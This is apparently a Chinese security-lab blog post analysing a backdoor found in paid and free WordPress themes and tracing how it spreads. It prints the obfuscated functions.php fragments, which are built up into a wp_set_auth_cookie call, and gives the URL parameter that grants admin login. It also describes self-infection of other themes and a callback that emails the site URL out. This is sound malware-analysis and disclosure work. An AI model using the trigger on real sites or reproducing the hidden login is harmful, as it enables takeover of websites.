Wordpress functions.php 主题文件后门分析 Secer's Blog - 记录互联网安全历程与个人成长经历

Author: p0wd3r，dawu，LG (知道创宇404安全实验室)

Date: 2016-11-15

0x00 概述

上周公司小伙伴给了我一个Wordpress主题让我帮忙审核，漏洞没有发现，但是却发现了这样一个后门：

当启用这个主题后，攻击者即可通过该后门远程无需密码以管理员权限登录到网站的后台中。

这个后门可谓“年代久远”，早在2010年就在国外被提出来了（http://harmonyinfotech.in/cms/wordpress-cms/wordpress-virus-function-_check_isactive_widgets/），然而令人遗憾的是时间过了这么久依然还有很多主题存在这个后门，更令人惊讶的是一些提供主题下载的网站也存在该后门，如果被人加以利用后果不堪设想。

0x01 详细分析

我们的样本是从某网站花86块购买的（没错，付费主题也存在问题），正常审计过程中会搜索代码中使用的敏感函数，当搜索call_user_func_array函数的时候发现了两处奇怪的用法：

functions.php第257行：

$sq1="...". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) . "...";

这里省略了不必要的部分。可以看到作者将call_user_func_array的结果拼接到sql语句中，当时只是好奇为什么这样写，然而将这段代码放到搜索引擎中却发现了意外的结果：http://ihacklog.com/post/wordpress-theme-malicious-code-analysis.html，可以看到这正是里面所描述的恶意代码。根据文中的叙述，这段恶意代码的作用是：

启用后主题后每当有人访问网站就检查网站中的所有主题是否已被感染，然后感染未被感染的主题，随后将网站url发送到 [email protected] 这个邮箱中

将文中的代码和本地的文件做一下对比（仅截取一部分）：

Alt text

发现只是在变量名上做了调整，然后在启用主题时进行动态调试，发现确实存在上文所说的向[email protected]发送邮件的行为：

Alt text

现在我们可以确定这个主题是存在问题的，但仅仅是向[email protected]发送我们网站url这么简单吗？

我们再来看下一处call_user_func_array调用：

functions.php第306-310行：

if ($use_link ) {
    if($forces_more) {
        $output .= "..." . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "...";
    } else {
        $output .= "...";
    }
}

当$use_link和$forces_more值为真时，调用call_user_func_array($checkwidgets,array($perpage, true))，我们来看一下相关变量的值：

if(!isset($method)) $method="cookie";
if(!isset($filter_p)) $filter_p="wp_";
if(!isset($use_link)) $use_link=1; 
if(!isset($perpage)) $perpage=$_GET["cperpage"];
if(!isset($authname)) $authname="auth";
if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
if(!isset($forces_more)) $forces_more=1;

可以看到$use_link和$force_more的值均为1，$checkwidgets值为wp_set_auth_cookie，所以这段函数可以精简为：call_user_func_array('wp_set_auth_cookie', array($_GET['cperpage'], true)。而wp_set_auth_cookie的作用是只需提供用户id即可实现登录（https://developer.wordpress.org/reference/functions/wp_set_auth_cookie/），我们实际操作一下：

未登录状态：

Alt text

访问http://url/index.php?cperpage=1：

Alt text

可以看到已经以管理员身份登录了，原来这里才是真正的后门所在。

总的来说该后门的功能如下：

启用后主题后每当有人访问网站就检查网站中的所有主题是否已被感染，然后感染未被感染的主题。
每当有人访问，检查是否曾向[email protected]发送邮件，若没有将网站url发送到[email protected]。
攻击者通过访问http://url/index.php?cperpage=1即可以管理员的身份登录使用被感染主题的网站。

0x02 影响 & 溯源

起初我们怀疑后门是由售卖主题的网站植入，但是我们发现该网站也是存在这个后门的：

不过有意思的是该网站的后门文件是上面所说的以前就被披露出的版本，和我们手中主题中的后门并不完全相同。

我们推断该网站售卖的主题是网站拥有者在其他主题的基础上更改的，而这些主题是被感染过的，但站长并没有对其进行检查。

随后我们又测试了另外一些售卖主题的网站，其中一个在百度搜索中排名十分靠前的网站也存在该后门：

Alt text

庆幸的是我们在这网站上下载的一些主题并不存在后门，但是这些高权重网站若被恶意利用后果将不堪设想。

源头在哪里？

通过这篇文章我们可以看到有人评论说 http://www.themes2wp.com （需挂代理访问，国内访问会403）上的主题均存在该后门，我们下载了最新的主题（11月13日发布）发现确实如此，并且该网站本身并不存在后门。不过该网站上的主题存在的后门是上面所提到的以前的版本，和我们的样本在变量名上有一定差别。

通过一段时间的探索，我们发现该网站上的主题是从其他网站下载的，例如 https://flexithemes.com，我们可以在其源码中搜索到相关内容：

Alt text

但是我们对比从两个网站下载的相同的主题：

Alt text

可以看到后者在前者的基础上在functions.php中添加了恶意代码，并在siderbar.php中添加了外链，外链域名与这个网站域名是同一个组织注册的：

Alt text

所以总的来说 http://www.themes2wp.com 有很大的嫌疑是传播的源头，它首先从其他一些免费主题下载站下载主题，然后向其中注入恶意代码并重新打包再提供给用户下载，并且可能有另一批人对后门进行了更改后再进行传播。www.themes2wp.com 于2009年注册，如果它真的是传播源头，仅从时间跨度上来看影响也是很大的。